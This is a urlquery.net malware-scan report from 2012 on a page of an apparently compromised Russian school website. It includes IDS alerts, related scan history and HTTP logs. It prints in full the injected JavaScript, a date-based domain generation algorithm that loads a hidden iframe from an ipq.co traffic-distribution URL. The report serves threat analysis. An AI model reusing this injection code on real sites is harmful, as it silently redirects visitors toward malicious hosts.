urlquery.net - Free url scanner

Overview

URL	http://www.sc62.lipetsk.ru/23q.htm
IP	195.34.232.173
ASN	AS8570 OJSC Rostelecom
Location	Russian Federation
Report completed	2012-11-06 23:37:20 CET
Status	Loading report..
urlQuery Alerts	Detected a TDS URL pattern

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-06 23:36:42	195.34.232.173	urlQuery Client	2	ET WEB_CLIENT eval String.fromCharCode String Which May Be Malicious
2012-11-06 23:36:42	195.34.232.173	urlQuery Client	1	ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 2)
2012-11-06 23:36:43	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data,
2012-11-06 23:36:43	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),
2012-11-06 23:36:43	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),
2012-11-06 23:36:43	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),
2012-11-06 23:36:43	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),
2012-11-06 23:36:44	195.34.232.173	urlQuery Client	3	FILEMAGIC Macromedia Flash data,

Snort /w Sourcefire VRT

No alerts detected

Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 195.34.232.173

Date	Alerts / IDS	URL	IP
2013-03-19 08:36:13	0 / 9	http://licey24.lipetsk.ru/english/presentation2.html	195.34.232.173
2013-03-14 02:22:11	2 / 3	http://zlpo.lipetsk.ru/index.htm	195.34.232.173
2013-03-04 01:13:18	2 / 3	http://zlpo.lipetsk.ru/bend_lgs.htm	195.34.232.173
2013-03-03 23:03:47	2 / 3	http://zlpo.lipetsk.ru/bend_lgr.htm	195.34.232.173
2013-02-11 17:51:50	1 / 0	http://www.sc62.lipetsk.ru/24q.htm	195.34.232.173
2013-01-13 16:43:45	1 / 0	http://lzop.lipetsk.ru/bend.htm	195.34.232.173

Last 6 reports on ASN: AS8570 OJSC Rostelecom

Date	Alerts / IDS	URL	IP
2013-03-19 08:36:13	0 / 9	http://licey24.lipetsk.ru/english/presentation2.html	195.34.232.173
2013-03-14 02:22:11	2 / 3	http://zlpo.lipetsk.ru/index.htm	195.34.232.173
2013-03-04 01:13:18	2 / 3	http://zlpo.lipetsk.ru/bend_lgs.htm	195.34.232.173
2013-03-03 23:03:47	2 / 3	http://zlpo.lipetsk.ru/bend_lgr.htm	195.34.232.173
2013-02-11 17:51:50	1 / 0	http://www.sc62.lipetsk.ru/24q.htm	195.34.232.173
2013-01-13 16:43:45	1 / 0	http://lzop.lipetsk.ru/bend.htm	195.34.232.173

Last 6 reports on domain: www.sc62.lipetsk.ru

Date	Alerts / IDS	URL	IP
2013-02-11 17:51:50	1 / 0	http://www.sc62.lipetsk.ru/24q.htm	195.34.232.173
2012-11-18 07:09:07	1 / 0	http://www.sc62.lipetsk.ru/	195.34.232.173
2012-11-14 06:57:37	1 / 8	http://www.sc62.lipetsk.ru/2.htm	195.34.232.173
2012-11-07 20:21:07	1 / 0	http://www.sc62.lipetsk.ru/7q.htm	195.34.232.173
2012-11-07 10:00:54	1 / 8	http://www.sc62.lipetsk.ru/2q.htm	195.34.232.173
2012-11-06 16:37:12	0 / 8	http://www.sc62.lipetsk.ru/24q.htm	195.34.232.173

JavaScript

Executed Scripts (4)

Executed Evals (1)

#1 JavaScript::Eval (size: 1704, repeated: 1)

function getMonthNum(abbMonth) {
    var arrMon = new Array("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec");
    var i;
    for (i = 0; i < arrMon.length; i++) {
        if (abbMonth == arrMon[i]) {
            return i;
        }
    }
    return -1;
}
function dateUTCdateToDate(dateString) {
    var arrDateStr = dateString.split(" ");
    var month = getMonthNum(arrDateStr[2]);
    var day = arrDateStr[1];
    var year = arrDateStr[3];
    var hour = arrDateStr[4].substr(0, 2);
    var minute = arrDateStr[4].substr(3, 2);
    var second = arrDateStr[4].substr(6, 2);
    return new Date(year, month, day, hour, minute, second);
}
function get_domain(y, m, d, h, prefix, postfix) {
    var chars = "k2pdh4qwej9j2rob51holnl3prxbkwhfp5ea";
    url = new String();
    for (var i = 0; i < 4; i++) {
        t = i;
        l = chars.length;
        t = (t + h) % l;
        url += chars.substr(t, 1);
        t = (t + d) % l;
        url += chars.substr(t, 1);
        t = (t + m) % l;
        url += chars.substr(t, 1);
        t = (t + y) % l;
        url += chars.substr(t, 1);
    }
    return (prefix + url + postfix).toLowerCase();
}
function get_current_domain(prefix, postfix) {
    var dt = new Date();
    var y = dt.getUTCFullYear();
    var m = dt.getMonth();
    var d = dt.getUTCDate();
    var h = dt.getUTCHours();
    return get_domain(y, m, d, Math.floor(h / 8), prefix, postfix);
}
var current_domain = "http://" + get_current_domain("g", "") + ".ipq.co/go.php?sid=3";
setTimeout(function() {
    try {
        var s = document.createElement("iframe");
        s.style.visibility = "hidden";
        s.style.display = "none";
        s.setAttribute("src", current_domain);
        document.body.appendChild(s)
    } catch (e) {}
}, 500);

Executed Writes (1)

#1 JavaScript::Write (size: 0, repeated: 1)

HTTP Transactions (17)

Request	Response
GET /23q.htm HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:42 GMT Connection: close Last-Modified: Mon, 01 Oct 2012 00:40:07 GMT Etag: "3dd4ae-4be3-a5a927c0" Accept-Ranges: bytes Content-Length: 19427
GET /%D0%B2%D0%BE%D1%81%D0%BF%D0%B8%D1%82%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D0%B0%D1%8F%20%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B0/Resize%20of%205.jpg HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 302 Found Content-Type: text/html; charset=iso-8859-1 Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:42 GMT Connection: close Location: http://www.lipetsk.ru/errors/404.html Content-Length: 221
GET /Orion%20(Universal)%20V1b%20Icon%2038.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:42 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:27 GMT Etag: "3dd431-f83e-cfffb9c0" Accept-Ranges: bytes Content-Length: 63550
GET /Orion%20(Universal)%20Bonus%20Pack%20V1%20Desktop%20X.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:42 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:26 GMT Etag: "3dd430-f83e-cff07780" Accept-Ranges: bytes Content-Length: 63550
GET /Recycle%201.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:42 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:30 GMT Etag: "3dd432-f83e-d02d8080" Accept-Ranges: bytes Content-Length: 63550
GET /2.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:43 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT Etag: "3dd427-8e-ce63bd00" Accept-Ranges: bytes Content-Length: 142
GET /3.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:43 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT Etag: "3dd42a-5da-ce63bd00" Accept-Ranges: bytes Content-Length: 1498
GET /Recycle.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:42 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:29 GMT Etag: "3dd433-f83e-d01e3e40" Accept-Ranges: bytes Content-Length: 63550
GET /4.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:43 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT Etag: "3dd42b-c71-ce63bd00" Accept-Ranges: bytes Content-Length: 3185
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1 Host: fpdownload2.macromedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/xml Server: Apache Last-Modified: Wed, 31 Oct 2012 21:22:10 GMT Etag: "87de33-256-4cd617ed12480" Accept-Ranges: bytes Content-Length: 598 Date: Tue, 06 Nov 2012 22:36:44 GMT Connection: keep-alive
GET /clock6.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:43 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:01 GMT Etag: "3dd42e-f58-ce72ff40" Accept-Ranges: bytes Content-Length: 3928
GET /5.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:43 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:20 GMT Etag: "3dd42d-3b73-cf94ea00" Accept-Ranges: bytes Content-Length: 15219
GET /1.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:43 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:22 GMT Etag: "3dd423-468f-cfb36e80" Accept-Ranges: bytes Content-Length: 18063
GET /setcookie.php?backurl=/errors/404.html& HTTP/1.1 Host: www.lipetsk.ru GET /setcookie.php?backurl=/errors/404.html& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm	HTTP/1.1 302 Found Content-Type: text/html; charset=windows-1251 Server: nginx/0.7.63 Date: Tue, 06 Nov 2012 22:36:44 GMT Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: Vzd=1; expires=Wed, 07 Nov 2012 22:36:44 GMT Location: http://www.lipetsk.ru/errors/404.html?pass=1&backurl=/errors/404.html&
GET /favicon.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 22:36:44 GMT Connection: close Last-Modified: Tue, 10 Jul 2007 10:48:55 GMT Etag: "3dd796-0-81fff3c0" Accept-Ranges: bytes Content-Length: 0
GET /go.php?sid=3 HTTP/1.1 Host: gpehodjobh9l54jn1.ipq.co User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm
GET /errors/404.html?pass=1&backurl=/errors/404.html& HTTP/1.1 Host: www.lipetsk.ru GET /errors/404.html?pass=1&backurl=/errors/404.html& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/23q.htm Cookie: Vzd=1	HTTP/1.1 200 OK Content-Type: text/html; charset=windows-1251 Server: nginx/0.7.63 Date: Tue, 06 Nov 2012 22:36:44 GMT Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: Ccnt[/errors/404.html]=1; expires=Wed, 07 Nov 2012 22:36:44 GMT